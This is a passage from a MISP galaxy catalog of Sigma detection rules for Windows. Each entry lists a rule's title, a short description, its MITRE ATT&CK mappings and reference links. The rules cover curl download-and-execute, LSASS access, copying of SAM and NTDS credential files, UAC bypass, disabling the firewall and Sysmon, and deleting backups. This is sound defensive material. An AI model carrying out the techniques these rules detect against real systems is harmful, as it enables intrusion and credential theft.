https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://www.intrinsec.com/akira_ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml

Compressed File Extraction Via Tar.EXE

Detects execution of "tar.exe" in order to extract a compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.

The tag is: misp-galaxy:sigma-rules="Compressed File Extraction Via Tar.EXE"

Compressed File Extraction Via Tar.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10541. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage

https://lolbas-project.github.io/lolbas/Binaries/Tar/

https://unit42.paloaltonetworks.com/chromeloader-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_extraction.yml

Sysmon Driver Unloaded Via Fltmc.EXE

Detects the Sysmon filter driver possibly being unloaded via fltmc.exe

The tag is: misp-galaxy:sigma-rules="Sysmon Driver Unloaded Via Fltmc.EXE"

Sysmon Driver Unloaded Via Fltmc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10542. Table References

Links

https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml

Potential CommandLine Path Traversal Via Cmd.EXE

Detects a potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking.

The tag is: misp-galaxy:sigma-rules="Potential CommandLine Path Traversal Via Cmd.EXE"

Potential CommandLine Path Traversal Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10543. Table References

Links

https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/

https://twitter.com/Oddvarmoe/status/1270633613449723905

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml

Curl Download And Execute Combination

Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.

The tag is: misp-galaxy:sigma-rules="Curl Download And Execute Combination"

Curl Download And Execute Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10544. Table References

Links

https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml

Copy From Or To Admin Share Or Sysvol Folder

Detects a copy command or a copy utility execution to or from an Admin share or remote

The tag is: misp-galaxy:sigma-rules="Copy From Or To Admin Share Or Sysvol Folder"

Copy From Or To Admin Share Or Sysvol Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10545. Table References

Links

https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html

https://twitter.com/SBousseaden/status/1211636381086339073

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml

UAC Bypass via ICMLuaUtil

Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface

The tag is: misp-galaxy:sigma-rules="UAC Bypass via ICMLuaUtil"

UAC Bypass via ICMLuaUtil has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10546. Table References

Links

https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml

HackTool - ADCSPwn Execution

Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service

The tag is: misp-galaxy:sigma-rules="HackTool - ADCSPwn Execution"

HackTool - ADCSPwn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 10547. Table References

Links

https://github.com/bats3c/ADCSPwn

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_adcspwn.yml

Sysprep on AppData Folder

Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)

The tag is: misp-galaxy:sigma-rules="Sysprep on AppData Folder"

Sysprep on AppData Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10548. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml

HackTool - SharpEvtMute Execution

Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs

The tag is: misp-galaxy:sigma-rules="HackTool - SharpEvtMute Execution"

HackTool - SharpEvtMute Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10549. Table References

Links

https://github.com/bats3c/EvtMute

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpevtmute.yml

PowerShell Get-Process LSASS

Detects the "Get-Process" cmdlet and its aliases being used on the lsass process, which is in almost all cases a sign of malicious activity

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Process LSASS"

PowerShell Get-Process LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 10550. Table References

Links

https://twitter.com/PythonResponder/status/1385064506049630211

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_getprocess_lsass.yml

PUA - AdFind Suspicious Execution

Detects AdFind execution with common flags seen used during attacks

The tag is: misp-galaxy:sigma-rules="PUA - AdFind Suspicious Execution"

PUA - AdFind Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 10551. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md

https://thedfirreport.com/2020/05/08/adfind-recon/

https://www.joeware.net/freetools/tools/adfind/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml

HackTool - winPEAS Execution

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz.

The tag is: misp-galaxy:sigma-rules="HackTool - winPEAS Execution"

HackTool - winPEAS Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 10552. Table References

Links

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

https://github.com/carlospolop/PEASS-ng

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml

Root Certificate Installed From Susp Locations

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="Root Certificate Installed From Susp Locations"

Root Certificate Installed From Susp Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10553. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml

Tasks Folder Evasion

The Tasks folders in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr.

The tag is: misp-galaxy:sigma-rules="Tasks Folder Evasion"

Tasks Folder Evasion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 10554. Table References

Links

https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26

https://twitter.com/subTee/status/1216465628946563073

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml

Suspicious Ping/Copy Command Combination

Detects an uncommon one-liner command that contains both ping and copy, which is usually used by malware.

The tag is: misp-galaxy:sigma-rules="Suspicious Ping/Copy Command Combination"

Suspicious Ping/Copy Command Combination has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10555. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml

Suspicious Modification Of Scheduled Tasks

Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location. Attackers can create a simple-looking task in order to avoid detection on creation, as that is often the most closely watched moment. Instead, they modify the task after creation to include their malicious payload.

The tag is: misp-galaxy:sigma-rules="Suspicious Modification Of Scheduled Tasks"

Suspicious Modification Of Scheduled Tasks has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10556. Table References

Links

Internal Research

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_change.yml

HackTool - PPID Spoofing SelectMyParent Tool Execution

Detects the use of parent process ID spoofing tools such as Didier Stevens' tool SelectMyParent

The tag is: misp-galaxy:sigma-rules="HackTool - PPID Spoofing SelectMyParent Tool Execution"

HackTool - PPID Spoofing SelectMyParent Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Parent PID Spoofing - T1134.004" with estimative-language:likelihood-probability="almost-certain"

Table 10557. Table References

Links

https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files

https://pentestlab.blog/2020/02/24/parent-pid-spoofing/

https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing

https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml

Firewall Disabled via Netsh.EXE

Detects netsh commands that turn off the Windows firewall

The tag is: misp-galaxy:sigma-rules="Firewall Disabled via Netsh.EXE"

Firewall Disabled via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10558. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall

https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/

https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml

Uncommon Child Process Of BgInfo.EXE

Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript

The tag is: misp-galaxy:sigma-rules="Uncommon Child Process Of BgInfo.EXE"

Uncommon Child Process Of BgInfo.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10559. Table References

Links

https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml

Custom Class Execution via Xwizard

Detects the execution of the Xwizard tool with specific arguments that are used to run custom class properties.

The tag is: misp-galaxy:sigma-rules="Custom Class Execution via Xwizard"

Custom Class Execution via Xwizard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10560. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Xwizard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml

Disable Important Scheduled Task

Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Disable Important Scheduled Task"

Disable Important Scheduled Task has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10561. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task

https://twitter.com/MichalKoczwara/status/1553634816016498688

https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml

Directory Removal Via Rmdir

Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

The tag is: misp-galaxy:sigma-rules="Directory Removal Via Rmdir"

Directory Removal Via Rmdir has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 10562. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml

Uncommon AddinUtil.EXE CommandLine Execution

Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.

The tag is: misp-galaxy:sigma-rules="Uncommon AddinUtil.EXE CommandLine Execution"

Uncommon AddinUtil.EXE CommandLine Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10563. Table References

Links

https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml

Potential COM Objects Download Cradles Usage - Process Creation

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

The tag is: misp-galaxy:sigma-rules="Potential COM Objects Download Cradles Usage - Process Creation"

Potential COM Objects Download Cradles Usage - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10564. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57

https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml

Scripting/CommandLine Process Spawned Regsvr32

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

The tag is: misp-galaxy:sigma-rules="Scripting/CommandLine Process Spawned Regsvr32"

Scripting/CommandLine Process Spawned Regsvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10566. Table References

Links

https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/

https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml

DLL Execution Via Register-cimprovider.exe

Detects the use of register-cimprovider.exe to execute an arbitrary DLL file.

The tag is: misp-galaxy:sigma-rules="DLL Execution Via Register-cimprovider.exe"

DLL Execution Via Register-cimprovider.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 10567. Table References

Links

https://twitter.com/PhilipTsukerman/status/992021361106268161

https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml

Uncommon Userinit Child Process

Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.

The tag is: misp-galaxy:sigma-rules="Uncommon Userinit Child Process"

Uncommon Userinit Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"

Table 10568. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core

https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml

SystemStateBackup Deleted Using Wbadmin.EXE

Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.

The tag is: misp-galaxy:sigma-rules="SystemStateBackup Deleted Using Wbadmin.EXE"

SystemStateBackup Deleted Using Wbadmin.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10570. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml

File Download Using ProtocolHandler.exe

Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)

The tag is: misp-galaxy:sigma-rules="File Download Using ProtocolHandler.exe"

File Download Using ProtocolHandler.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10571. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_download.yml

Uncommon One Time Only Scheduled Task At 00:00

Detects scheduled task creation events that include suspicious actions and that run once at 00:00

The tag is: misp-galaxy:sigma-rules="Uncommon One Time Only Scheduled Task At 00:00"

Uncommon One Time Only Scheduled Task At 00:00 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10572. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml

Copying Sensitive Files with Credential Data

Detects the copying of files with well-known filenames (sensitive files containing credential data)

The tag is: misp-galaxy:sigma-rules="Copying Sensitive Files with Credential Data"

Copying Sensitive Files with Credential Data has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10573. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/

https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml

Suspicious Driver Install by pnputil.exe

Detects when a possibly suspicious driver is being installed via the pnputil.exe LOLBin

The tag is: misp-galaxy:sigma-rules="Suspicious Driver Install by pnputil.exe"

Suspicious Driver Install by pnputil.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 10574. Table References

Links

https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html

https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml

Use of UltraVNC Remote Access Software

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.

The tag is: misp-galaxy:sigma-rules="Use of UltraVNC Remote Access Software"

Use of UltraVNC Remote Access Software has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10575. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml

Indirect Inline Command Execution Via Bash.EXE

Detects execution of the Microsoft bash launcher with the "-c" flag. This can be used to bypass defenses and execute Linux or Windows binaries indirectly via bash

The tag is: misp-galaxy:sigma-rules="Indirect Inline Command Execution Via Bash.EXE"

Indirect Inline Command Execution Via Bash.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10576. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Bash/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_command_execution.yml

Operator Bloopers Cobalt Strike Modules

Detects Cobalt Strike modules/commands accidentally entered into a CMD shell

The tag is: misp-galaxy:sigma-rules="Operator Bloopers Cobalt Strike Modules"

Operator Bloopers Cobalt Strike Modules has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10577. Table References

Links

https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml

Service Started/Stopped Via Wmic.EXE

Detects usage of wmic to start or stop a service

The tag is: misp-galaxy:sigma-rules="Service Started/Stopped Via Wmic.EXE"

Service Started/Stopped Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10578. Table References

Links

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service_manipulation.yml

Odbcconf.EXE Suspicious DLL Location

Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.

The tag is: misp-galaxy:sigma-rules="Odbcconf.EXE Suspicious DLL Location"

Odbcconf.EXE Suspicious DLL Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10579. Table References

Links

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml

Potentially Suspicious Windows App Activity

Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Windows App Activity"

Table 10580. Table References

Links

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml

Mshtml.DLL RunHTMLApplication Suspicious Usage

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http, etc.)

The tag is: misp-galaxy:sigma-rules="Mshtml.DLL RunHTMLApplication Suspicious Usage"

Table 10581. Table References

Links

http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt

https://twitter.com/n1nj4sec/status/1421190238081277959

https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI

Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"

The tag is: misp-galaxy:sigma-rules="Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI"

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10582. Table References

Links

https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/

https://twitter.com/pfiatde/status/1681977680688738305

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3

